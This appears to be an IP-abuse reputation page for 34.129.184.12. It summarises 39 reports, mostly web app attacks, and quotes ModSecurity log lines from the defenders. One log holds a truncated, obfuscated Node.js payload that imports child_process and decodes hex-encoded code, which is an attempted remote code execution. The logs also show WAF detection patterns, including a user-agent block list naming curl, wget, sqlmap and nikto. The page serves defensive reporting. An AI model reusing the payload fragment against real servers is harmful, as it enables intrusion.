This IP address has been reported a total of
39
times from
25 distinct
sources.
34.129.184.12 was first reported on
, and the most recent report was
.
In the last 60 days, the top reporter locations were:
Germany
with 8
reports;
Spain
with 6
reports;
Switzerland
with 5
reports.
The most common categories in these recent reports were:
Web App Attack
33
times;
Bad Web Bot
13
times;
Hacking
12
times;
Brute-Force
2
times;
SQL Injection
1
time;
Other
2
times.
Recent Reports
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
[SatOct1023:14:04.5385772026][security2:error][pid342832:tid342922][client34.129.184.12:0]ModSecurit ...
show more[SatOct1023:14:04.5385772026][security2:error][pid342832:tid342922][client34.129.184.12:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?i\)\\\\\\\\b\(\?:i\(\?:s\(\?:_\(\?:in\(\?:t\(\?:eger\)\?\|finite\)\|n\(\?:u\(\?:meric\|ll\)\|an\)\|\(\?:calla\|dou\)ble\|s\(\?:calar\|tring\)\|f\(\?:inite\|loat\)\|re\(\?:source\|al\)\|l\(\?:ink\|ong\)\|a\(\?:rray\)\?\|object\|bool\)\|set\)\|n\(\?:\(\?:clud\|vok\)e\|t\(\?:div\|val\)\)\|\(\?:mplod\|dat\)e\|conv\)\|s\(\?:t\(\?:r\(\?:\(\?:le\|sp\)n\|...\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"582\"][id\"380026\"][rev\"27\"][msg\"Atomicorp.comWAFRules:PHPpayloaddetected\"][data\"function\(\'returnimport\(\\\\x5c\\\\x22node:child_process\\\\x5c\\\\x22\)\'\)\(\)\,function\(\'returnimport\(\\\\x5c\\\\x22node:zlib\\\\x5c\\\\x22\)\'\)\(\)]\).then\(\([cp\,zlib]\)=\>{returnnewpromise\(\(resolve\,reject\)=\>{try{varuser_code=global[string.fromcharcode\(66\,117\,102\,102\,101\,114\)].from\(\'286173796e632066756e6374696f6e28297b636f6e7
show less
Repeated exploit attempts, for example: / Failed to lock global mutex: Invalid argument (HTTP/1.1 po ...
show moreRepeated exploit attempts, for example: / Failed to lock global mutex: Invalid argument (HTTP/1.1 port 443, user agent: "Python/3.10 aiohttp/3.14.3")
show less
[FriOct0919:40:52.7273892026][security2:error][pid2948390:tid2948512][client34.129.184.12:0]ModSecur ...
show more[FriOct0919:40:52.7273892026][security2:error][pid2948390:tid2948512][client34.129.184.12:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?i\)\\\\\\\\b\(\?:i\(\?:s\(\?:_\(\?:in\(\?:t\(\?:eger\)\?\|finite\)\|n\(\?:u\(\?:meric\|ll\)\|an\)\|\(\?:calla\|dou\)ble\|s\(\?:calar\|tring\)\|f\(\?:inite\|loat\)\|re\(\?:source\|al\)\|l\(\?:ink\|ong\)\|a\(\?:rray\)\?\|object\|bool\)\|set\)\|n\(\?:\(\?:clud\|vok\)e\|t\(\?:div\|val\)\)\|\(\?:mplod\|dat\)e\|conv\)\|s\(\?:t\(\?:r\(\?:\(\?:le\|sp\)n\|...\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"582\"][id\"380026\"][rev\"27\"][msg\"Atomicorp.comWAFRules:PHPpayloaddetected\"][data\"function\(\'returnimport\(\\\\x5c\\\\x22node:child_process\\\\x5c\\\\x22\)\'\)\(\)\,function\(\'returnimport\(\\\\x5c\\\\x22node:zlib\\\\x5c\\\\x22\)\'\)\(\)]\).then\(\([cp\,zlib]\)=\>{returnnewpromise\(\(resolve\,reject\)=\>{try{varuser_code=global[string.fromcharcode\(66\,117\,102\,102\,101\,114\)].from\(\'286173796e632066756e6374696f6e28297b636f6
show less
[FriOct0904:11:36.7863842026][security2:error][pid3182317:tid3182455][client34.129.184.12:0]ModSecur ...
show more[FriOct0904:11:36.7863842026][security2:error][pid3182317:tid3182455][client34.129.184.12:0]ModSecurity:Accessdeniedwithcode403\(phase1\).Patternmatch\"\(\?i\)\(curl\|wget\|python\|nikto\|sqlmap\|acunetix\|fimap\|dirbuster\|cmsmap\)\"atREQUEST_HEADERS:User-Agent.[file\"/etc/apache2/conf.d/modsec_custom_rules.conf\"][line\"217\"][id\"990210\"][msg\"Suspicioususer-agentblocked\"][hostname\"www.test.pytag.ch\"][uri\"/\"][unique_id\"ashNWL2pJPEgiOC1CZ-DqgAAARQ\"]
show less